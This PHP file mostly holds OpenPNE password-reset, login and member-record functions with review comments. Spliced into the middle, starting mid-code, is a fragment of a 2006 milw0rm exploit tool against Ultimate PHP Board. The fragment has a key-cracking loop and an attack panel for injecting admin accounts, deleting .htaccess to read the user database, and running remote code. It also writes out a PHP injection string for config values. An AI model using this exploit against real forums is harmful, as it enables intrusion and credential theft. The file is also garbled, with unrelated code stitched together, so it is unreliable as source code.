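/**
 * Validate a password-reset link and, if it is still good, expose its
 * parameters to the reset form (mobile "ktai" flow, judging by the redirect target).
 *
 * Reads `session` (the reset token) and `id` (the encrypted member id) from
 * the request, checks the token against the one stored for the member and
 * enforces a 24-hour lifetime.
 *
 * @param array $requests Request variables; `session` and `id` are read.
 * @return string 'success' when the link is valid.
 */
function execute($requests)
{
    // Redirect when external authentication is in use.
    // (meaning of the boolean argument is not visible here — TODO confirm)
    check_action4pne_slave(true);

    // --- request variables
    $session = $requests['session'];
    $id = $requests['id'];
    // ----------

    // Recover the member id from the encrypted id carried in the link
    // (the original comment calls it "hashed", but it is reversed with t_decrypt()).
    $c_member_id = t_decrypt($id);

    // Authorization: a reset token and its issue time must both be on record.
    // NOTE(review): these checks rely on handle_kengen_error() ending the request — confirm.
    if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid')) {
        handle_kengen_error();
    }
    if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid_time')) {
        handle_kengen_error();
    }

    $c_member_config = db_member_c_member_config4c_member_id($c_member_id);

    // Authorization: the presented token must equal the stored one.
    // Compared as strings with a strict operator so that PHP's loose-comparison
    // type juggling cannot make two different tokens compare equal.
    // Where the runtime provides hash_equals(), it is the constant-time alternative.
    $stored_sid = $c_member_config['password_reset_sid'];
    if (!is_scalar($session) || (string)$stored_sid !== (string)$session) {
        handle_kengen_error();
    }

    // The token is valid for 24 hours from the recorded issue time.
    $one_day_time = 86400;
    $limit_password_reset_sid_time = $c_member_config['password_reset_sid_time'] + $one_day_time;

    // Authorization: reject expired tokens.
    if (time() > $limit_password_reset_sid_time) {
        // Message id 55 is resolved elsewhere; used here for the expiry case.
        $p = array('msg' => 55);
        openpne_redirect('ktai', 'page_o_login', $p);
        // Stop explicitly so an expired link can never fall through to the form,
        // whether or not openpne_redirect() terminates on its own.
        exit;
    }

    $this->set('session', $session);
    $this->set('id', $id);

    return 'success';
}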
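/**
 * Complete a password reset (PC flow, judging by the redirect targets).
 *
 * Validates the reset token (`session`) for the member identified by the
 * encrypted `id`, enforces the 24-hour token lifetime, validates the new
 * password, stores it, and then deletes the token so it cannot be reused.
 * Every path ends in a redirect; nothing is returned.
 *
 * @param array $requests Request variables; `session`, `id`, `new_password`
 *                        and `new_password2` are read.
 */
function execute($requests)
{
    // Redirect when external authentication is in use.
    // (meaning of the boolean argument is not visible here — TODO confirm)
    check_action4pne_slave(false);

    // --- request variables
    $session = $requests['session'];
    $id = $requests['id'];
    $new_password = $requests['new_password'];
    $new_password2 = $requests['new_password2'];
    // ----------

    // Recover the member id from the encrypted id carried in the link
    // (the original comment calls it "hashed", but it is reversed with t_decrypt()).
    $c_member_id = t_decrypt($id);

    // Authorization: a reset token and its issue time must both be on record.
    // NOTE(review): these checks rely on handle_kengen_error() ending the request — confirm.
    if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid')) {
        handle_kengen_error();
    }
    if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid_time')) {
        handle_kengen_error();
    }

    $c_member_config = db_member_c_member_config4c_member_id($c_member_id);

    // Authorization: the presented token must equal the stored one.
    // Compared as strings with a strict operator so that PHP's loose-comparison
    // type juggling cannot make two different tokens compare equal.
    // Where the runtime provides hash_equals(), it is the constant-time alternative.
    $stored_sid = $c_member_config['password_reset_sid'];
    if (!is_scalar($session) || (string)$stored_sid !== (string)$session) {
        handle_kengen_error();
    }

    // The token is valid for 24 hours from the recorded issue time.
    $one_day_time = 86400;
    $limit_password_reset_sid_time = $c_member_config['password_reset_sid_time'] + $one_day_time;

    // Authorization: reject expired tokens.
    if (time() > $limit_password_reset_sid_time) {
        $p = array('msg_code' => 'password_reset_timeout');
        openpne_redirect('pc', 'page_o_tologin', $p);
        // Stop explicitly so an expired token can never reach the password
        // update below, whether or not openpne_redirect() terminates on its own.
        exit;
    }

    // Validate the new password; only the first collected message is shown.
    // NOTE(review): the 6-12 alphanumeric rule caps password strength; relaxing it
    // is a policy change that depends on code outside this block.
    $msg_list = array();
    if (!$new_password) {
        $msg_list[] = "パスワードを入力してください";
    }
    if (!$new_password2) {
        $msg_list[] = "パスワード(確認)を入力してください";
    }
    if ($new_password !== $new_password2) {
        $msg_list[] = "パスワードが一致しません";
    }
    if (!ctype_alnum($new_password) || strlen($new_password) < 6 || strlen($new_password) > 12) {
        $msg_list[] = "パスワードは6~12文字の半角英数で入力してください";
    }

    // Validation failed: send the user back to the form with the token intact.
    if ($msg_list) {
        $p = array('msg' => array_shift($msg_list), 'session' => $session, 'id' => $id);
        openpne_redirect('pc', 'page_o_password_reset', $p);
        exit;
    }

    db_member_update_password($c_member_id, $new_password);

    // Invalidate the token so the same link cannot be used a second time.
    db_member_delete_c_member_config($c_member_id, 'password_reset_sid_time');
    db_member_delete_c_member_config($c_member_id, 'password_reset_sid');

    $p = array('msg_code' => 'change_password');
    openpne_redirect('pc', 'page_o_tologin', $p);
}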
/**
 * Prepare the mobile (ktai) login page.
 *
 * When an external login URL is configured and the built-in login form is
 * switched off, hands the client over to that URL. Otherwise assigns the
 * message text, the decrypted mobile address and site settings to the view.
 *
 * @param array $requests Request variables; `msg` and `kad` are read.
 * @return string 'success'
 */
function execute($requests)
{
    if (LOGIN_URL_KTAI) {
        if (!DISPLAY_LOGIN) {
            client_redirect_absolute(LOGIN_URL_KTAI);
        }
    }

    // --- request variables
    $message_id = $requests['msg'];
    $encrypted_address = $requests['kad'];
    // ----------

    // Message text looked up from its id.
    $message = k_p_common_msg4msg_id($message_id);
    $this->set('msg', $message);

    // The address arrives encrypted in the request and is decrypted for display.
    // NOTE(review): output escaping is presumably done by the view — confirm.
    $ktai_address = t_decrypt($encrypted_address);
    $this->set('ktai_address', $ktai_address);

    $this->set('SNS_NAME', SNS_NAME);
    $this->set('IS_CLOSED_SNS', IS_CLOSED_SNS);

    // inc_entry_point
    $entry_point = fetch_inc_entry_point($this->getView(), 'ktai_o_login');
    $this->set('inc_ktai_entry_point', $entry_point);

    return 'success';
}
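/**
 * Complete a password reset (mobile "ktai" flow, judging by the redirect targets).
 *
 * Validates the reset token (`session`) for the member identified by the
 * encrypted `id`, enforces the 24-hour token lifetime, validates the new
 * password, stores it, and then deletes the token so it cannot be reused.
 * Every path ends in a redirect; nothing is returned.
 *
 * @param array $requests Request variables; `session`, `id` and
 *                        `new_password` are read.
 */
function execute($requests)
{
    // Redirect when external authentication is in use.
    // (meaning of the boolean argument is not visible here — TODO confirm)
    check_action4pne_slave(true);

    // --- request variables
    $session = $requests['session'];
    $id = $requests['id'];
    $new_password = $requests['new_password'];
    // ----------

    // Recover the member id from the encrypted id carried in the link
    // (the original comment calls it "hashed", but it is reversed with t_decrypt()).
    $c_member_id = t_decrypt($id);

    // Authorization: a reset token and its issue time must both be on record.
    // NOTE(review): these checks rely on handle_kengen_error() ending the request — confirm.
    if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid')) {
        handle_kengen_error();
    }
    if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid_time')) {
        handle_kengen_error();
    }

    $c_member_config = db_member_c_member_config4c_member_id($c_member_id);

    // Authorization: the presented token must equal the stored one.
    // Compared as strings with a strict operator so that PHP's loose-comparison
    // type juggling cannot make two different tokens compare equal.
    // Where the runtime provides hash_equals(), it is the constant-time alternative.
    $stored_sid = $c_member_config['password_reset_sid'];
    if (!is_scalar($session) || (string)$stored_sid !== (string)$session) {
        handle_kengen_error();
    }

    // The token is valid for 24 hours from the recorded issue time.
    $one_day_time = 86400;
    $limit_password_reset_sid_time = $c_member_config['password_reset_sid_time'] + $one_day_time;

    // Authorization: reject expired tokens.
    if (time() > $limit_password_reset_sid_time) {
        // Message id 55 is resolved elsewhere; used here for the expiry case.
        $p = array('msg' => 55);
        openpne_redirect('ktai', 'page_o_login', $p);
        // Stop explicitly so an expired token can never reach the password
        // update below, whether or not openpne_redirect() terminates on its own.
        exit;
    }

    // Is the new password an acceptable string?
    // NOTE(review): the 6-12 alphanumeric rule caps password strength; relaxing it
    // is a policy change that depends on code outside this block.
    if (!ctype_alnum($new_password) || strlen($new_password) < 6 || strlen($new_password) > 12) {
        $p = array('msg' => 20, 'session' => $session, 'id' => $id);
        openpne_redirect('ktai', 'page_o_password_reset', $p);
        // Stop explicitly so a rejected password is never stored.
        exit;
    }

    db_member_update_password($c_member_id, $new_password);

    // Invalidate the token so the same link cannot be used a second time.
    db_member_delete_c_member_config($c_member_id, 'password_reset_sid_time');
    db_member_delete_c_member_config($c_member_id, 'password_reset_sid');

    $p = array('msg' => 21);
    openpne_redirect('ktai', 'page_o_login', $p);
}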
if (isset($_REQUEST['cypher']) && isset($_REQUEST['plain'])) { $cypher_len = strlen($_REQUEST['cypher']); $offset = gen_offset($_REQUEST['cypher'], $_REQUEST['plain']); print "Offset:"; for ($x = 0; $x < $cypher_len; $x++) { print $offset[$x] . ':'; } print '<br>'; $validKeys = 0; $y = 0; for ($y = 255; $y >= 0; $y--) { $newKey[$y] = gen_collision($offset, $y); $key_len = strlen($newKey[$y]); print "<br>Key:{$y} = "; for ($x = 0; $x <= $key_len; $x++) { print $newKey[$y][$x]; } print "<br>Cypher:" . t_encrypt($_REQUEST['plain'], $newKey[$y]); print "<br>Plain :" . t_decrypt($_REQUEST['cypher'], $newKey[$y]) . "<br><br>"; } exit; } } } } } print "<title> Ultimate PHP Board Remote Code EXEC 0-Day </title>\n \n <CENTER><B><I>0-day</I></B></CENTER>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Get Admin</I></B><br>\n <B>Inject an administrative account into UPB:</B>\n <p>\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Path to attack:<i>(example: http://www.domain.ext/PathToUPB)</i><br>\n <input name=\"addVict\" type=\"text\" size=60> <br>\n Inject Name:<br>\n <input name=\"addName\" type=\"text\" size=60> <br>\n Inject Password:<br>\n <input name=\"addPass\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Inject Admin\"> \n </form>\n \n <p>\n <B>PHP code injection is possilbe in the admin panel without an exploit. Both admin_config.php and admin_config2.php can be used to execute PHP by tagging on: ' \";phpinfo(); \$crap=\"1 ' to any of the config values </B>( double quotes \" are only used in exploit)</B>\n <p> \n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Gain Read Access To The Database</I></B>\n\n <form ACTION=" . 
$_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Removes /db/.htaccess to allow access to the remote target's flat file database:<i>(example: http://www.domain.ext/PathToUPB [no trailing slash]) (user database in /db/users.dat) </i><br><br>\n <input name=\"victHTA\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Attack\">\n </form> \n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Crypto</I></B> \n\t\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Plain Text Password:<br>\n <input name=\"encrypt\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Encrypt\"> \n </form>\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n Encrypted Password:<br>\n <input name=\"decrypt\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Decrypt\"> \n </form>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br> \n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Plain Text:<br>\n <input name=\"plain\" type=\"text\" size=60> <br>\n <p> \n corosponding cypher text:<br>\n <input name=\"cypher\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"crack key\"> \n </form>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Proof of Concept Only, Unstable Remote Code Execution Using NON-SQL Database Injection</I></B>\n <form ACTION=" . $_SERVER['PHP_SELF'] . 
" method=\"post\"> \n <p>\n perl CGI Code Injection Attack Remote Target:<br>\n <input name=\"vict\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Attack\">\n </form>\n \n <B>http://www.domain.ext/PathToUPB (no trailing slash)</B>\n </body>"; ?> # milw0rm.com [2006-06-20]
/**
 * Fetch a member's protected record with the encrypted address fields decrypted.
 *
 * The three address columns are passed through t_decrypt(); the remaining
 * columns (easy_access_id, hashed_password, hashed_password_query_answer)
 * are returned exactly as stored.
 *
 * NOTE(review): the result carries the password and secret-answer hashes, so
 * callers should avoid passing the whole row to views or logs.
 *
 * @param mixed $c_member_id Member id; coerced with intval() before binding.
 * @return mixed The row as an array, or whatever db_get_row() returns when
 *               the result is not an array.
 */
function db_member_c_member_secure4c_member_id($c_member_id)
{
    // The id is bound as a placeholder value, never interpolated into the SQL.
    $query = 'SELECT pc_address, ktai_address, regist_address, easy_access_id,'
        . ' hashed_password, hashed_password_query_answer'
        . ' FROM c_member_secure WHERE c_member_id = ?';
    $bindings = array(intval($c_member_id));

    $row = db_get_row($query, $bindings);
    if (!is_array($row)) {
        return $row;
    }

    // Only the address columns are stored encrypted.
    foreach (array('pc_address', 'ktai_address', 'regist_address') as $column) {
        $row[$column] = t_decrypt($row[$column]);
    }

    return $row;
}